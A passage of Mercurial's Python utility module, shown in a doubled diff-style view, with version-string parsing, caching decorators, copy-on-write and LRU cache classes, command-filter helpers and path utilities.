792 logdata=False):
792 logdata=False):
793 """Turn a file object into a logging file object."""
793 """Turn a file object into a logging file object."""
794
794
795 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
795 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
796 logdata=logdata)
796 logdata=logdata)
797 return fileobjectproxy(fh, observer)
797 return fileobjectproxy(fh, observer)
798
798
799 def version():
799 def version():
800 """Return version information if available."""
800 """Return version information if available."""
801 try:
801 try:
802 from . import __version__
802 from . import __version__
803 return __version__.version
803 return __version__.version
804 except ImportError:
804 except ImportError:
805 return 'unknown'
805 return 'unknown'
806
806
807 def versiontuple(v=None, n=4):
807 def versiontuple(v=None, n=4):
808 """Parses a Mercurial version string into an N-tuple.
808 """Parses a Mercurial version string into an N-tuple.
809
809
810 The version string to be parsed is specified with the ``v`` argument.
810 The version string to be parsed is specified with the ``v`` argument.
811 If it isn't defined, the current Mercurial version string will be parsed.
811 If it isn't defined, the current Mercurial version string will be parsed.
812
812
813 ``n`` can be 2, 3, or 4. Here is how some version strings map to
813 ``n`` can be 2, 3, or 4. Here is how some version strings map to
814 returned values:
814 returned values:
815
815
816 >>> v = b'3.6.1+190-df9b73d2d444'
816 >>> v = b'3.6.1+190-df9b73d2d444'
817 >>> versiontuple(v, 2)
817 >>> versiontuple(v, 2)
818 (3, 6)
818 (3, 6)
819 >>> versiontuple(v, 3)
819 >>> versiontuple(v, 3)
820 (3, 6, 1)
820 (3, 6, 1)
821 >>> versiontuple(v, 4)
821 >>> versiontuple(v, 4)
822 (3, 6, 1, '190-df9b73d2d444')
822 (3, 6, 1, '190-df9b73d2d444')
823
823
824 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
824 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
825 (3, 6, 1, '190-df9b73d2d444+20151118')
825 (3, 6, 1, '190-df9b73d2d444+20151118')
826
826
827 >>> v = b'3.6'
827 >>> v = b'3.6'
828 >>> versiontuple(v, 2)
828 >>> versiontuple(v, 2)
829 (3, 6)
829 (3, 6)
830 >>> versiontuple(v, 3)
830 >>> versiontuple(v, 3)
831 (3, 6, None)
831 (3, 6, None)
832 >>> versiontuple(v, 4)
832 >>> versiontuple(v, 4)
833 (3, 6, None, None)
833 (3, 6, None, None)
834
834
835 >>> v = b'3.9-rc'
835 >>> v = b'3.9-rc'
836 >>> versiontuple(v, 2)
836 >>> versiontuple(v, 2)
837 (3, 9)
837 (3, 9)
838 >>> versiontuple(v, 3)
838 >>> versiontuple(v, 3)
839 (3, 9, None)
839 (3, 9, None)
840 >>> versiontuple(v, 4)
840 >>> versiontuple(v, 4)
841 (3, 9, None, 'rc')
841 (3, 9, None, 'rc')
842
842
843 >>> v = b'3.9-rc+2-02a8fea4289b'
843 >>> v = b'3.9-rc+2-02a8fea4289b'
844 >>> versiontuple(v, 2)
844 >>> versiontuple(v, 2)
845 (3, 9)
845 (3, 9)
846 >>> versiontuple(v, 3)
846 >>> versiontuple(v, 3)
847 (3, 9, None)
847 (3, 9, None)
848 >>> versiontuple(v, 4)
848 >>> versiontuple(v, 4)
849 (3, 9, None, 'rc+2-02a8fea4289b')
849 (3, 9, None, 'rc+2-02a8fea4289b')
850 """
850 """
851 if not v:
851 if not v:
852 v = version()
852 v = version()
853 parts = remod.split('[\+-]', v, 1)
853 parts = remod.split('[\+-]', v, 1)
854 if len(parts) == 1:
854 if len(parts) == 1:
855 vparts, extra = parts[0], None
855 vparts, extra = parts[0], None
856 else:
856 else:
857 vparts, extra = parts
857 vparts, extra = parts
858
858
859 vints = []
859 vints = []
860 for i in vparts.split('.'):
860 for i in vparts.split('.'):
861 try:
861 try:
862 vints.append(int(i))
862 vints.append(int(i))
863 except ValueError:
863 except ValueError:
864 break
864 break
865 # (3, 6) -> (3, 6, None)
865 # (3, 6) -> (3, 6, None)
866 while len(vints) < 3:
866 while len(vints) < 3:
867 vints.append(None)
867 vints.append(None)
868
868
869 if n == 2:
869 if n == 2:
870 return (vints[0], vints[1])
870 return (vints[0], vints[1])
871 if n == 3:
871 if n == 3:
872 return (vints[0], vints[1], vints[2])
872 return (vints[0], vints[1], vints[2])
873 if n == 4:
873 if n == 4:
874 return (vints[0], vints[1], vints[2], extra)
874 return (vints[0], vints[1], vints[2], extra)
875
875
876 def cachefunc(func):
876 def cachefunc(func):
877 '''cache the result of function calls'''
877 '''cache the result of function calls'''
878 # XXX doesn't handle keywords args
878 # XXX doesn't handle keywords args
879 if func.__code__.co_argcount == 0:
879 if func.__code__.co_argcount == 0:
880 cache = []
880 cache = []
881 def f():
881 def f():
882 if len(cache) == 0:
882 if len(cache) == 0:
883 cache.append(func())
883 cache.append(func())
884 return cache[0]
884 return cache[0]
885 return f
885 return f
886 cache = {}
886 cache = {}
887 if func.__code__.co_argcount == 1:
887 if func.__code__.co_argcount == 1:
888 # we gain a small amount of time because
888 # we gain a small amount of time because
889 # we don't need to pack/unpack the list
889 # we don't need to pack/unpack the list
890 def f(arg):
890 def f(arg):
891 if arg not in cache:
891 if arg not in cache:
892 cache[arg] = func(arg)
892 cache[arg] = func(arg)
893 return cache[arg]
893 return cache[arg]
894 else:
894 else:
895 def f(*args):
895 def f(*args):
896 if args not in cache:
896 if args not in cache:
897 cache[args] = func(*args)
897 cache[args] = func(*args)
898 return cache[args]
898 return cache[args]
899
899
900 return f
900 return f
901
901
902 class cow(object):
902 class cow(object):
903 """helper class to make copy-on-write easier
903 """helper class to make copy-on-write easier
904
904
905 Call preparewrite before doing any writes.
905 Call preparewrite before doing any writes.
906 """
906 """
907
907
908 def preparewrite(self):
908 def preparewrite(self):
909 """call this before writes, return self or a copied new object"""
909 """call this before writes, return self or a copied new object"""
910 if getattr(self, '_copied', 0):
910 if getattr(self, '_copied', 0):
911 self._copied -= 1
911 self._copied -= 1
912 return self.__class__(self)
912 return self.__class__(self)
913 return self
913 return self
914
914
915 def copy(self):
915 def copy(self):
916 """always do a cheap copy"""
916 """always do a cheap copy"""
917 self._copied = getattr(self, '_copied', 0) + 1
917 self._copied = getattr(self, '_copied', 0) + 1
918 return self
918 return self
919
919
920 class sortdict(collections.OrderedDict):
920 class sortdict(collections.OrderedDict):
921 '''a simple sorted dictionary
921 '''a simple sorted dictionary
922
922
923 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
923 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
924 >>> d2 = d1.copy()
924 >>> d2 = d1.copy()
925 >>> d2
925 >>> d2
926 sortdict([('a', 0), ('b', 1)])
926 sortdict([('a', 0), ('b', 1)])
927 >>> d2.update([(b'a', 2)])
927 >>> d2.update([(b'a', 2)])
928 >>> list(d2.keys()) # should still be in last-set order
928 >>> list(d2.keys()) # should still be in last-set order
929 ['b', 'a']
929 ['b', 'a']
930 '''
930 '''
931
931
932 def __setitem__(self, key, value):
932 def __setitem__(self, key, value):
933 if key in self:
933 if key in self:
934 del self[key]
934 del self[key]
935 super(sortdict, self).__setitem__(key, value)
935 super(sortdict, self).__setitem__(key, value)
936
936
937 if pycompat.ispypy:
937 if pycompat.ispypy:
938 # __setitem__() isn't called as of PyPy 5.8.0
938 # __setitem__() isn't called as of PyPy 5.8.0
939 def update(self, src):
939 def update(self, src):
940 if isinstance(src, dict):
940 if isinstance(src, dict):
941 src = src.iteritems()
941 src = src.iteritems()
942 for k, v in src:
942 for k, v in src:
943 self[k] = v
943 self[k] = v
944
944
945 class cowdict(cow, dict):
945 class cowdict(cow, dict):
946 """copy-on-write dict
946 """copy-on-write dict
947
947
948 Be sure to call d = d.preparewrite() before writing to d.
948 Be sure to call d = d.preparewrite() before writing to d.
949
949
950 >>> a = cowdict()
950 >>> a = cowdict()
951 >>> a is a.preparewrite()
951 >>> a is a.preparewrite()
952 True
952 True
953 >>> b = a.copy()
953 >>> b = a.copy()
954 >>> b is a
954 >>> b is a
955 True
955 True
956 >>> c = b.copy()
956 >>> c = b.copy()
957 >>> c is a
957 >>> c is a
958 True
958 True
959 >>> a = a.preparewrite()
959 >>> a = a.preparewrite()
960 >>> b is a
960 >>> b is a
961 False
961 False
962 >>> a is a.preparewrite()
962 >>> a is a.preparewrite()
963 True
963 True
964 >>> c = c.preparewrite()
964 >>> c = c.preparewrite()
965 >>> b is c
965 >>> b is c
966 False
966 False
967 >>> b is b.preparewrite()
967 >>> b is b.preparewrite()
968 True
968 True
969 """
969 """
970
970
971 class cowsortdict(cow, sortdict):
971 class cowsortdict(cow, sortdict):
972 """copy-on-write sortdict
972 """copy-on-write sortdict
973
973
974 Be sure to call d = d.preparewrite() before writing to d.
974 Be sure to call d = d.preparewrite() before writing to d.
975 """
975 """
976
976
977 class transactional(object):
977 class transactional(object):
978 """Base class for making a transactional type into a context manager."""
978 """Base class for making a transactional type into a context manager."""
979 __metaclass__ = abc.ABCMeta
979 __metaclass__ = abc.ABCMeta
980
980
981 @abc.abstractmethod
981 @abc.abstractmethod
982 def close(self):
982 def close(self):
983 """Successfully closes the transaction."""
983 """Successfully closes the transaction."""
984
984
985 @abc.abstractmethod
985 @abc.abstractmethod
986 def release(self):
986 def release(self):
987 """Marks the end of the transaction.
987 """Marks the end of the transaction.
988
988
989 If the transaction has not been closed, it will be aborted.
989 If the transaction has not been closed, it will be aborted.
990 """
990 """
991
991
992 def __enter__(self):
992 def __enter__(self):
993 return self
993 return self
994
994
995 def __exit__(self, exc_type, exc_val, exc_tb):
995 def __exit__(self, exc_type, exc_val, exc_tb):
996 try:
996 try:
997 if exc_type is None:
997 if exc_type is None:
998 self.close()
998 self.close()
999 finally:
999 finally:
1000 self.release()
1000 self.release()
1001
1001
1002 @contextlib.contextmanager
1002 @contextlib.contextmanager
1003 def acceptintervention(tr=None):
1003 def acceptintervention(tr=None):
1004 """A context manager that closes the transaction on InterventionRequired
1004 """A context manager that closes the transaction on InterventionRequired
1005
1005
1006 If no transaction was provided, this simply runs the body and returns
1006 If no transaction was provided, this simply runs the body and returns
1007 """
1007 """
1008 if not tr:
1008 if not tr:
1009 yield
1009 yield
1010 return
1010 return
1011 try:
1011 try:
1012 yield
1012 yield
1013 tr.close()
1013 tr.close()
1014 except error.InterventionRequired:
1014 except error.InterventionRequired:
1015 tr.close()
1015 tr.close()
1016 raise
1016 raise
1017 finally:
1017 finally:
1018 tr.release()
1018 tr.release()
1019
1019
1020 @contextlib.contextmanager
1020 @contextlib.contextmanager
1021 def nullcontextmanager():
1021 def nullcontextmanager():
1022 yield
1022 yield
1023
1023
1024 class _lrucachenode(object):
1024 class _lrucachenode(object):
1025 """A node in a doubly linked list.
1025 """A node in a doubly linked list.
1026
1026
1027 Holds a reference to nodes on either side as well as a key-value
1027 Holds a reference to nodes on either side as well as a key-value
1028 pair for the dictionary entry.
1028 pair for the dictionary entry.
1029 """
1029 """
1030 __slots__ = (u'next', u'prev', u'key', u'value')
1030 __slots__ = (u'next', u'prev', u'key', u'value')
1031
1031
1032 def __init__(self):
1032 def __init__(self):
1033 self.next = None
1033 self.next = None
1034 self.prev = None
1034 self.prev = None
1035
1035
1036 self.key = _notset
1036 self.key = _notset
1037 self.value = None
1037 self.value = None
1038
1038
1039 def markempty(self):
1039 def markempty(self):
1040 """Mark the node as emptied."""
1040 """Mark the node as emptied."""
1041 self.key = _notset
1041 self.key = _notset
1042
1042
1043 class lrucachedict(object):
1043 class lrucachedict(object):
1044 """Dict that caches most recent accesses and sets.
1044 """Dict that caches most recent accesses and sets.
1045
1045
1046 The dict consists of an actual backing dict - indexed by original
1046 The dict consists of an actual backing dict - indexed by original
1047 key - and a doubly linked circular list defining the order of entries in
1047 key - and a doubly linked circular list defining the order of entries in
1048 the cache.
1048 the cache.
1049
1049
1050 The head node is the newest entry in the cache. If the cache is full,
1050 The head node is the newest entry in the cache. If the cache is full,
1051 we recycle head.prev and make it the new head. Cache accesses result in
1051 we recycle head.prev and make it the new head. Cache accesses result in
1052 the node being moved to before the existing head and being marked as the
1052 the node being moved to before the existing head and being marked as the
1053 new head node.
1053 new head node.
1054 """
1054 """
1055 def __init__(self, max):
1055 def __init__(self, max):
1056 self._cache = {}
1056 self._cache = {}
1057
1057
1058 self._head = head = _lrucachenode()
1058 self._head = head = _lrucachenode()
1059 head.prev = head
1059 head.prev = head
1060 head.next = head
1060 head.next = head
1061 self._size = 1
1061 self._size = 1
1062 self._capacity = max
1062 self._capacity = max
1063
1063
1064 def __len__(self):
1064 def __len__(self):
1065 return len(self._cache)
1065 return len(self._cache)
1066
1066
1067 def __contains__(self, k):
1067 def __contains__(self, k):
1068 return k in self._cache
1068 return k in self._cache
1069
1069
1070 def __iter__(self):
1070 def __iter__(self):
1071 # We don't have to iterate in cache order, but why not.
1071 # We don't have to iterate in cache order, but why not.
1072 n = self._head
1072 n = self._head
1073 for i in range(len(self._cache)):
1073 for i in range(len(self._cache)):
1074 yield n.key
1074 yield n.key
1075 n = n.next
1075 n = n.next
1076
1076
1077 def __getitem__(self, k):
1077 def __getitem__(self, k):
1078 node = self._cache[k]
1078 node = self._cache[k]
1079 self._movetohead(node)
1079 self._movetohead(node)
1080 return node.value
1080 return node.value
1081
1081
1082 def __setitem__(self, k, v):
1082 def __setitem__(self, k, v):
1083 node = self._cache.get(k)
1083 node = self._cache.get(k)
1084 # Replace existing value and mark as newest.
1084 # Replace existing value and mark as newest.
1085 if node is not None:
1085 if node is not None:
1086 node.value = v
1086 node.value = v
1087 self._movetohead(node)
1087 self._movetohead(node)
1088 return
1088 return
1089
1089
1090 if self._size < self._capacity:
1090 if self._size < self._capacity:
1091 node = self._addcapacity()
1091 node = self._addcapacity()
1092 else:
1092 else:
1093 # Grab the last/oldest item.
1093 # Grab the last/oldest item.
1094 node = self._head.prev
1094 node = self._head.prev
1095
1095
1096 # At capacity. Kill the old entry.
1096 # At capacity. Kill the old entry.
1097 if node.key is not _notset:
1097 if node.key is not _notset:
1098 del self._cache[node.key]
1098 del self._cache[node.key]
1099
1099
1100 node.key = k
1100 node.key = k
1101 node.value = v
1101 node.value = v
1102 self._cache[k] = node
1102 self._cache[k] = node
1103 # And mark it as newest entry. No need to adjust order since it
1103 # And mark it as newest entry. No need to adjust order since it
1104 # is already self._head.prev.
1104 # is already self._head.prev.
1105 self._head = node
1105 self._head = node
1106
1106
1107 def __delitem__(self, k):
1107 def __delitem__(self, k):
1108 node = self._cache.pop(k)
1108 node = self._cache.pop(k)
1109 node.markempty()
1109 node.markempty()
1110
1110
1111 # Temporarily mark as newest item before re-adjusting head to make
1111 # Temporarily mark as newest item before re-adjusting head to make
1112 # this node the oldest item.
1112 # this node the oldest item.
1113 self._movetohead(node)
1113 self._movetohead(node)
1114 self._head = node.next
1114 self._head = node.next
1115
1115
1116 # Additional dict methods.
1116 # Additional dict methods.
1117
1117
1118 def get(self, k, default=None):
1118 def get(self, k, default=None):
1119 try:
1119 try:
1120 return self._cache[k].value
1120 return self._cache[k].value
1121 except KeyError:
1121 except KeyError:
1122 return default
1122 return default
1123
1123
1124 def clear(self):
1124 def clear(self):
1125 n = self._head
1125 n = self._head
1126 while n.key is not _notset:
1126 while n.key is not _notset:
1127 n.markempty()
1127 n.markempty()
1128 n = n.next
1128 n = n.next
1129
1129
1130 self._cache.clear()
1130 self._cache.clear()
1131
1131
1132 def copy(self):
1132 def copy(self):
1133 result = lrucachedict(self._capacity)
1133 result = lrucachedict(self._capacity)
1134 n = self._head.prev
1134 n = self._head.prev
1135 # Iterate in oldest-to-newest order, so the copy has the right ordering
1135 # Iterate in oldest-to-newest order, so the copy has the right ordering
1136 for i in range(len(self._cache)):
1136 for i in range(len(self._cache)):
1137 result[n.key] = n.value
1137 result[n.key] = n.value
1138 n = n.prev
1138 n = n.prev
1139 return result
1139 return result
1140
1140
1141 def _movetohead(self, node):
1141 def _movetohead(self, node):
1142 """Mark a node as the newest, making it the new head.
1142 """Mark a node as the newest, making it the new head.
1143
1143
1144 When a node is accessed, it becomes the freshest entry in the LRU
1144 When a node is accessed, it becomes the freshest entry in the LRU
1145 list, which is denoted by self._head.
1145 list, which is denoted by self._head.
1146
1146
1147 Visually, let's make ``N`` the new head node (* denotes head):
1147 Visually, let's make ``N`` the new head node (* denotes head):
1148
1148
1149 previous/oldest <-> head <-> next/next newest
1149 previous/oldest <-> head <-> next/next newest
1150
1150
1151 ----<->--- A* ---<->-----
1151 ----<->--- A* ---<->-----
1152 | |
1152 | |
1153 E <-> D <-> N <-> C <-> B
1153 E <-> D <-> N <-> C <-> B
1154
1154
1155 To:
1155 To:
1156
1156
1157 ----<->--- N* ---<->-----
1157 ----<->--- N* ---<->-----
1158 | |
1158 | |
1159 E <-> D <-> C <-> B <-> A
1159 E <-> D <-> C <-> B <-> A
1160
1160
1161 This requires the following moves:
1161 This requires the following moves:
1162
1162
1163 C.next = D (node.prev.next = node.next)
1163 C.next = D (node.prev.next = node.next)
1164 D.prev = C (node.next.prev = node.prev)
1164 D.prev = C (node.next.prev = node.prev)
1165 E.next = N (head.prev.next = node)
1165 E.next = N (head.prev.next = node)
1166 N.prev = E (node.prev = head.prev)
1166 N.prev = E (node.prev = head.prev)
1167 N.next = A (node.next = head)
1167 N.next = A (node.next = head)
1168 A.prev = N (head.prev = node)
1168 A.prev = N (head.prev = node)
1169 """
1169 """
1170 head = self._head
1170 head = self._head
1171 # C.next = D
1171 # C.next = D
1172 node.prev.next = node.next
1172 node.prev.next = node.next
1173 # D.prev = C
1173 # D.prev = C
1174 node.next.prev = node.prev
1174 node.next.prev = node.prev
1175 # N.prev = E
1175 # N.prev = E
1176 node.prev = head.prev
1176 node.prev = head.prev
1177 # N.next = A
1177 # N.next = A
1178 # It is tempting to do just "head" here, however if node is
1178 # It is tempting to do just "head" here, however if node is
1179 # adjacent to head, this will do bad things.
1179 # adjacent to head, this will do bad things.
1180 node.next = head.prev.next
1180 node.next = head.prev.next
1181 # E.next = N
1181 # E.next = N
1182 node.next.prev = node
1182 node.next.prev = node
1183 # A.prev = N
1183 # A.prev = N
1184 node.prev.next = node
1184 node.prev.next = node
1185
1185
1186 self._head = node
1186 self._head = node
1187
1187
1188 def _addcapacity(self):
1188 def _addcapacity(self):
1189 """Add a node to the circular linked list.
1189 """Add a node to the circular linked list.
1190
1190
1191 The new node is inserted before the head node.
1191 The new node is inserted before the head node.
1192 """
1192 """
1193 head = self._head
1193 head = self._head
1194 node = _lrucachenode()
1194 node = _lrucachenode()
1195 head.prev.next = node
1195 head.prev.next = node
1196 node.prev = head.prev
1196 node.prev = head.prev
1197 node.next = head
1197 node.next = head
1198 head.prev = node
1198 head.prev = node
1199 self._size += 1
1199 self._size += 1
1200 return node
1200 return node
1201
1201
1202 def lrucachefunc(func):
1202 def lrucachefunc(func):
1203 '''cache most recent results of function calls'''
1203 '''cache most recent results of function calls'''
1204 cache = {}
1204 cache = {}
1205 order = collections.deque()
1205 order = collections.deque()
1206 if func.__code__.co_argcount == 1:
1206 if func.__code__.co_argcount == 1:
1207 def f(arg):
1207 def f(arg):
1208 if arg not in cache:
1208 if arg not in cache:
1209 if len(cache) > 20:
1209 if len(cache) > 20:
1210 del cache[order.popleft()]
1210 del cache[order.popleft()]
1211 cache[arg] = func(arg)
1211 cache[arg] = func(arg)
1212 else:
1212 else:
1213 order.remove(arg)
1213 order.remove(arg)
1214 order.append(arg)
1214 order.append(arg)
1215 return cache[arg]
1215 return cache[arg]
1216 else:
1216 else:
1217 def f(*args):
1217 def f(*args):
1218 if args not in cache:
1218 if args not in cache:
1219 if len(cache) > 20:
1219 if len(cache) > 20:
1220 del cache[order.popleft()]
1220 del cache[order.popleft()]
1221 cache[args] = func(*args)
1221 cache[args] = func(*args)
1222 else:
1222 else:
1223 order.remove(args)
1223 order.remove(args)
1224 order.append(args)
1224 order.append(args)
1225 return cache[args]
1225 return cache[args]
1226
1226
1227 return f
1227 return f
1228
1228
1229 class propertycache(object):
1229 class propertycache(object):
1230 def __init__(self, func):
1230 def __init__(self, func):
1231 self.func = func
1231 self.func = func
1232 self.name = func.__name__
1232 self.name = func.__name__
1233 def __get__(self, obj, type=None):
1233 def __get__(self, obj, type=None):
1234 result = self.func(obj)
1234 result = self.func(obj)
1235 self.cachevalue(obj, result)
1235 self.cachevalue(obj, result)
1236 return result
1236 return result
1237
1237
1238 def cachevalue(self, obj, value):
1238 def cachevalue(self, obj, value):
1239 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1239 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1240 obj.__dict__[self.name] = value
1240 obj.__dict__[self.name] = value
1241
1241
1242 def clearcachedproperty(obj, prop):
1242 def clearcachedproperty(obj, prop):
1243 '''clear a cached property value, if one has been set'''
1243 '''clear a cached property value, if one has been set'''
1244 if prop in obj.__dict__:
1244 if prop in obj.__dict__:
1245 del obj.__dict__[prop]
1245 del obj.__dict__[prop]
1246
1246
1247 def pipefilter(s, cmd):
1247 def pipefilter(s, cmd):
1248 '''filter string S through command CMD, returning its output'''
1248 '''filter string S through command CMD, returning its output'''
1249 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1249 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1250 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1250 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1251 pout, perr = p.communicate(s)
1251 pout, perr = p.communicate(s)
1252 return pout
1252 return pout
1253
1253
1254 def tempfilter(s, cmd):
1254 def tempfilter(s, cmd):
1255 '''filter string S through a pair of temporary files with CMD.
1255 '''filter string S through a pair of temporary files with CMD.
1256 CMD is used as a template to create the real command to be run,
1256 CMD is used as a template to create the real command to be run,
1257 with the strings INFILE and OUTFILE replaced by the real names of
1257 with the strings INFILE and OUTFILE replaced by the real names of
1258 the temporary files generated.'''
1258 the temporary files generated.'''
1259 inname, outname = None, None
1259 inname, outname = None, None
1260 try:
1260 try:
1261 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1261 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1262 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1262 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1263 fp.write(s)
1263 fp.write(s)
1264 fp.close()
1264 fp.close()
1265 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1265 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1266 os.close(outfd)
1266 os.close(outfd)
1267 cmd = cmd.replace('INFILE', inname)
1267 cmd = cmd.replace('INFILE', inname)
1268 cmd = cmd.replace('OUTFILE', outname)
1268 cmd = cmd.replace('OUTFILE', outname)
1269 code = os.system(cmd)
1269 code = os.system(cmd)
1270 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1270 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1271 code = 0
1271 code = 0
1272 if code:
1272 if code:
1273 raise Abort(_("command '%s' failed: %s") %
1273 raise Abort(_("command '%s' failed: %s") %
1274 (cmd, explainexit(code)))
1274 (cmd, explainexit(code)))
1275 return readfile(outname)
1275 return readfile(outname)
1276 finally:
1276 finally:
1277 try:
1277 try:
1278 if inname:
1278 if inname:
1279 os.unlink(inname)
1279 os.unlink(inname)
1280 except OSError:
1280 except OSError:
1281 pass
1281 pass
1282 try:
1282 try:
1283 if outname:
1283 if outname:
1284 os.unlink(outname)
1284 os.unlink(outname)
1285 except OSError:
1285 except OSError:
1286 pass
1286 pass
1287
1287
1288 filtertable = {
1288 filtertable = {
1289 'tempfile:': tempfilter,
1289 'tempfile:': tempfilter,
1290 'pipe:': pipefilter,
1290 'pipe:': pipefilter,
1291 }
1291 }
1292
1292
1293 def filter(s, cmd):
1293 def filter(s, cmd):
1294 "filter a string through a command that transforms its input to its output"
1294 "filter a string through a command that transforms its input to its output"
1295 for name, fn in filtertable.iteritems():
1295 for name, fn in filtertable.iteritems():
1296 if cmd.startswith(name):
1296 if cmd.startswith(name):
1297 return fn(s, cmd[len(name):].lstrip())
1297 return fn(s, cmd[len(name):].lstrip())
1298 return pipefilter(s, cmd)
1298 return pipefilter(s, cmd)
1299
1299
1300 def binary(s):
1300 def binary(s):
1301 """return true if a string is binary data"""
1301 """return true if a string is binary data"""
1302 return bool(s and '\0' in s)
1302 return bool(s and '\0' in s)
1303
1303
1304 def increasingchunks(source, min=1024, max=65536):
1304 def increasingchunks(source, min=1024, max=65536):
1305 '''return no less than min bytes per chunk while data remains,
1305 '''return no less than min bytes per chunk while data remains,
1306 doubling min after each chunk until it reaches max'''
1306 doubling min after each chunk until it reaches max'''
1307 def log2(x):
1307 def log2(x):
1308 if not x:
1308 if not x:
1309 return 0
1309 return 0
1310 i = 0
1310 i = 0
1311 while x:
1311 while x:
1312 x >>= 1
1312 x >>= 1
1313 i += 1
1313 i += 1
1314 return i - 1
1314 return i - 1
1315
1315
1316 buf = []
1316 buf = []
1317 blen = 0
1317 blen = 0
1318 for chunk in source:
1318 for chunk in source:
1319 buf.append(chunk)
1319 buf.append(chunk)
1320 blen += len(chunk)
1320 blen += len(chunk)
1321 if blen >= min:
1321 if blen >= min:
1322 if min < max:
1322 if min < max:
1323 min = min << 1
1323 min = min << 1
1324 nmin = 1 << log2(blen)
1324 nmin = 1 << log2(blen)
1325 if nmin > min:
1325 if nmin > min:
1326 min = nmin
1326 min = nmin
1327 if min > max:
1327 if min > max:
1328 min = max
1328 min = max
1329 yield ''.join(buf)
1329 yield ''.join(buf)
1330 blen = 0
1330 blen = 0
1331 buf = []
1331 buf = []
1332 if buf:
1332 if buf:
1333 yield ''.join(buf)
1333 yield ''.join(buf)
1334
1334
1335 Abort = error.Abort
1335 Abort = error.Abort
1336
1336
1337 def always(fn):
1337 def always(fn):
1338 return True
1338 return True
1339
1339
1340 def never(fn):
1340 def never(fn):
1341 return False
1341 return False
1342
1342
1343 def nogc(func):
1343 def nogc(func):
1344 """disable garbage collector
1344 """disable garbage collector
1345
1345
1346 Python's garbage collector triggers a GC each time a certain number of
1346 Python's garbage collector triggers a GC each time a certain number of
1347 container objects (the number being defined by gc.get_threshold()) are
1347 container objects (the number being defined by gc.get_threshold()) are
1348 allocated even when marked not to be tracked by the collector. Tracking has
1348 allocated even when marked not to be tracked by the collector. Tracking has
1349 no effect on when GCs are triggered, only on what objects the GC looks
1349 no effect on when GCs are triggered, only on what objects the GC looks
1350 into. As a workaround, disable GC while building complex (huge)
1350 into. As a workaround, disable GC while building complex (huge)
1351 containers.
1351 containers.
1352
1352
1353 This garbage collector issue have been fixed in 2.7. But it still affect
1353 This garbage collector issue have been fixed in 2.7. But it still affect
1354 CPython's performance.
1354 CPython's performance.
1355 """
1355 """
1356 def wrapper(*args, **kwargs):
1356 def wrapper(*args, **kwargs):
1357 gcenabled = gc.isenabled()
1357 gcenabled = gc.isenabled()
1358 gc.disable()
1358 gc.disable()
1359 try:
1359 try:
1360 return func(*args, **kwargs)
1360 return func(*args, **kwargs)
1361 finally:
1361 finally:
1362 if gcenabled:
1362 if gcenabled:
1363 gc.enable()
1363 gc.enable()
1364 return wrapper
1364 return wrapper
1365
1365
1366 if pycompat.ispypy:
1366 if pycompat.ispypy:
1367 # PyPy runs slower with gc disabled
1367 # PyPy runs slower with gc disabled
1368 nogc = lambda x: x
1368 nogc = lambda x: x
1369
1369
1370 def pathto(root, n1, n2):
1370 def pathto(root, n1, n2):
1371 '''return the relative path from one place to another.
1371 '''return the relative path from one place to another.
1372 root should use os.sep to separate directories
1372 root should use os.sep to separate directories
1373 n1 should use os.sep to separate directories
1373 n1 should use os.sep to separate directories
1374 n2 should use "/" to separate directories
1374 n2 should use "/" to separate directories
1375 returns an os.sep-separated path.
1375 returns an os.sep-separated path.
1376
1376
1377 If n1 is a relative path, it's assumed it's
1377 If n1 is a relative path, it's assumed it's
1378 relative to root.
1378 relative to root.
1379 n2 should always be relative to root.
1379 n2 should always be relative to root.
1380 '''
1380 '''
1381 if not n1:
1381 if not n1:
1382 return localpath(n2)
1382 return localpath(n2)
1383 if os.path.isabs(n1):
1383 if os.path.isabs(n1):
1384 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1384 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1385 return os.path.join(root, localpath(n2))
1385 return os.path.join(root, localpath(n2))
1386 n2 = '/'.join((pconvert(root), n2))
1386 n2 = '/'.join((pconvert(root), n2))
1387 a, b = splitpath(n1), n2.split('/')
1387 a, b = splitpath(n1), n2.split('/')
1388 a.reverse()
1388 a.reverse()
1389 b.reverse()
1389 b.reverse()
1390 while a and b and a[-1] == b[-1]:
1390 while a and b and a[-1] == b[-1]:
1391 a.pop()
1391 a.pop()
1392 b.pop()
1392 b.pop()
1393 b.reverse()
1393 b.reverse()
1394 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1394 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1395
1395
1396 def mainfrozen():
1396 def mainfrozen():
1397 """return True if we are a frozen executable.
1397 """return True if we are a frozen executable.
1398
1398
1399 The code supports py2exe (most common, Windows only) and tools/freeze
1399 The code supports py2exe (most common, Windows only) and tools/freeze
1400 (portable, not much used).
1400 (portable, not much used).
1401 """
1401 """
1402 return (safehasattr(sys, "frozen") or # new py2exe
1402 return (safehasattr(sys, "frozen") or # new py2exe
1403 safehasattr(sys, "importers") or # old py2exe
1403 safehasattr(sys, "importers") or # old py2exe
1404 imp.is_frozen(u"__main__")) # tools/freeze
1404 imp.is_frozen(u"__main__")) # tools/freeze
1405
1405
1406 # the location of data files matching the source code
1406 # the location of data files matching the source code
1407 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1407 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1408 # executable version (py2exe) doesn't support __file__
1408 # executable version (py2exe) doesn't support __file__
1409 datapath = os.path.dirname(pycompat.sysexecutable)
